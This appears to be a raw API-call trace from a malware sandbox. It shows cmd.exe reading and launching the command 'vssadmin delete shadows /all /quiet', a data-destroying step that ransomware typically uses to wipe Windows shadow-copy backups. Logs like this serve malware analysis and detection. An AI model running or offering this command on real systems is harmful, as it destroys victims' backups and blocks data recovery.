cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1 [0170.710] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.710] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.710] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.710] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c5c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1 [0170.710] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.710] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.710] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.710] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c5e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0170.710] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.710] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.710] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.710] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c60, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0170.710] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.710] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.710] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.710] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c62, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0170.710] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.710] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.710] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.711] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c64, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0170.711] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.711] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.711] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.711] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c66, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0170.711] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.711] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.711] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.711] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c68, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0170.711] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.711] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.711] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.711] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c6a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0170.711] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.711] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.711] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.711] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c6c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0170.712] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.712] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.712] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.712] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c6e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0170.712] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.712] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.712] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.712] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c70, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0170.712] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.712] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.712] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.712] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c72, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0170.712] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.712] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.712] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.712] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c74, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0170.712] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.712] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.712] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0170.713] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c76, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0170.713] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.713] GetFileType (hFile=0x248) returned 0x3 [0170.713] _get_osfhandle (_FileHandle=0) returned 0x248 [0170.713] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.713] _get_osfhandle (_FileHandle=1) returned 0x254 [0170.713] GetFileType (hFile=0x254) returned 0x3 [0170.713] _get_osfhandle (_FileHandle=1) returned 0x254 [0170.713] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0170.713] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x4253cff658, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x4253cff658*=0x24, lpOverlapped=0x0) returned 1 [0170.713] GetProcessHeap () returned 0x1916fa10000 [0170.713] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x4012) returned 0x1916fa18e90 [0170.713] GetProcessHeap () returned 0x1916fa10000 [0170.713] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa18e90) returned 1 [0170.714] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0170.714] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0170.714] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0170.714] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0170.714] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0170.714] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0170.714] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0170.714] GetProcessHeap () returned 0x1916fa10000 [0170.714] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xb0) returned 0x1916fa291a0 [0170.714] GetProcessHeap () returned 0x1916fa10000 [0170.714] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x22) returned 0x1916fa16330 [0170.715] GetProcessHeap () returned 0x1916fa10000 [0170.715] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x48) returned 0x1916fa29260 [0170.715] GetConsoleOutputCP () returned 0x4e3 [0170.931] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0170.931] SetThreadUILanguage (LangId=0x0) returned 0x409 [0171.162] GetConsoleTitleW (in: lpConsoleTitle=0x4253cff4a0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0171.261] malloc (_Size=0xffce) returned 0x1916fb30840 [0171.261] ??_V@YAXPEAX@Z () returned 0x1916fb30840 [0171.261] malloc (_Size=0xffce) returned 0x1916fb40820 [0171.261] ??_V@YAXPEAX@Z () returned 0x1916fb40820 [0171.261] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0171.261] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0171.261] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0171.261] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0171.261] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0171.261] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0171.261] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0171.261] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0171.304] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0171.304] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0171.304] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0171.304] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0171.304] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0171.304] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0171.304] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0171.304] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0171.304] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0171.304] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0171.304] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0171.304] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0171.304] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0171.304] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0171.304] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0171.304] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0171.304] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0171.304] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0171.304] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0171.304] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0171.304] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0171.304] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0171.304] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0171.304] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0171.304] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0171.304] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0171.305] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0171.305] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0171.305] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0171.305] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0171.305] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0171.305] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0171.305] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0171.305] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0171.305] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0171.305] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0171.305] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0171.305] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0171.305] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0171.305] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0171.305] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0171.305] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0171.305] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0171.305] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0171.305] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0171.305] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0171.305] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0171.305] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0171.305] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0171.305] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0171.305] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0171.305] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0171.305] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0171.306] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0171.306] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0171.306] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0171.306] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0171.306] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0171.306] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0171.306] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0171.306] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0171.306] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0171.306] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0171.306] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0171.306] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0171.306] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0171.306] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0171.306] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0171.306] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0171.306] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0171.306] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0171.306] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0171.306] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0171.306] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0171.306] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0171.306] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0171.306] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0171.306] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0171.306] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0171.307] ??_V@YAXPEAX@Z () returned 0x1 [0171.307] GetProcessHeap () returned 0x1916fa10000 [0171.307] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xffde) returned 0x1916fa18e90 [0171.307] GetProcessHeap () returned 0x1916fa10000 [0171.307] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x5a) returned 0x1916fa292b0 [0171.307] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0171.307] malloc (_Size=0xffce) returned 0x1916fb40820 [0171.307] ??_V@YAXPEAX@Z () returned 0x1916fb40820 [0171.308] GetProcessHeap () returned 0x1916fa10000 [0171.308] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x1ffac) returned 0x1916fa2c1e0 [0171.309] SetErrorMode (uMode=0x0) returned 0x0 [0171.309] SetErrorMode (uMode=0x1) returned 0x0 [0171.309] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1916fa2c1f0, lpFilePart=0x4253cfed20 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x4253cfed20*="system32") returned 0x13 [0171.309] SetErrorMode (uMode=0x0) returned 0x1 [0171.309] GetProcessHeap () returned 0x1916fa10000 [0171.309] RtlReAllocateHeap (Heap=0x1916fa10000, Flags=0x0, Ptr=0x1916fa2c1e0, Size=0x4a) returned 0x1916fa2c1e0 [0171.309] GetProcessHeap () returned 0x1916fa10000 [0171.309] RtlSizeHeap (HeapHandle=0x1916fa10000, Flags=0x0, MemoryPointer=0x1916fa2c1e0) returned 0x4a [0171.310] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps;") returned 0xbc [0171.310] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0171.310] GetProcessHeap () returned 0x1916fa10000 [0171.310] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x1b6) returned 0x1916fa28e80 [0171.310] GetProcessHeap () returned 0x1916fa10000 [0171.310] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x35c) returned 0x1916fa29b70 [0171.310] GetProcessHeap () returned 0x1916fa10000 [0171.310] RtlReAllocateHeap (Heap=0x1916fa10000, Flags=0x0, Ptr=0x1916fa29b70, Size=0x1b8) returned 0x1916fa29b70 [0171.310] GetProcessHeap () returned 0x1916fa10000 [0171.310] RtlSizeHeap (HeapHandle=0x1916fa10000, Flags=0x0, MemoryPointer=0x1916fa29b70) returned 0x1b8 [0171.310] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0171.310] GetProcessHeap () returned 0x1916fa10000 [0171.310] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xe8) returned 0x1916fa29040 [0171.310] GetProcessHeap () returned 0x1916fa10000 [0171.310] RtlReAllocateHeap (Heap=0x1916fa10000, Flags=0x0, Ptr=0x1916fa29040, Size=0x7e) returned 0x1916fa29040 [0171.310] GetProcessHeap () returned 0x1916fa10000 [0171.310] RtlSizeHeap (HeapHandle=0x1916fa10000, Flags=0x0, MemoryPointer=0x1916fa29040) returned 0x7e [0171.310] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0171.310] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x4253cfea90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4253cfea90) returned 0x1916fa290d0 [0171.311] FindClose (in: hFindFile=0x1916fa290d0 | out: hFindFile=0x1916fa290d0) returned 1 [0171.311] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x4253cfea90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4253cfea90) returned 0xffffffffffffffff [0171.311] GetLastError () returned 0x2 [0171.311] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x4253cfea90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4253cfea90) returned 0x1916fa290d0 [0171.311] FindClose (in: hFindFile=0x1916fa290d0 | out: hFindFile=0x1916fa290d0) returned 1 [0171.312] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0171.312] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0171.312] ??_V@YAXPEAX@Z () returned 0x1 [0171.312] GetConsoleTitleW (in: lpConsoleTitle=0x4253cff010, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0171.547] GetProcessHeap () returned 0x1916fa10000 [0171.547] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x21c) returned 0x1916fa177c0 [0171.547] GetConsoleTitleW (in: lpConsoleTitle=0x1916fa177d0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0171.750] GetProcessHeap () returned 0x1916fa10000 [0171.750] RtlReAllocateHeap (Heap=0x1916fa10000, Flags=0x0, Ptr=0x1916fa177c0, Size=0xa4) returned 0x1916fa177c0 [0171.750] GetProcessHeap () returned 0x1916fa10000 [0171.750] RtlSizeHeap (HeapHandle=0x1916fa10000, Flags=0x0, MemoryPointer=0x1916fa177c0) returned 0xa4 [0171.750] SetConsoleTitleW (lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0171.901] GetProcessHeap () returned 0x1916fa10000 [0171.902] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa177c0) returned 1 [0171.902] InitializeProcThreadAttributeList (in: lpAttributeList=0x4253cfef30, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4253cfee20 | out: lpAttributeList=0x4253cfef30, lpSize=0x4253cfee20) returned 1 [0171.902] UpdateProcThreadAttribute (in: lpAttributeList=0x4253cfef30, dwFlags=0x0, Attribute=0x60001, lpValue=0x4253cfee0c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4253cfef30, lpPreviousValue=0x0) returned 1 [0171.902] GetStartupInfoW (in: lpStartupInfo=0x4253cfeec0 | out: lpStartupInfo=0x4253cfeec0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254)) [0171.902] GetProcessHeap () returned 0x1916fa10000 [0171.902] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x20) returned 0x1916fa17610 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 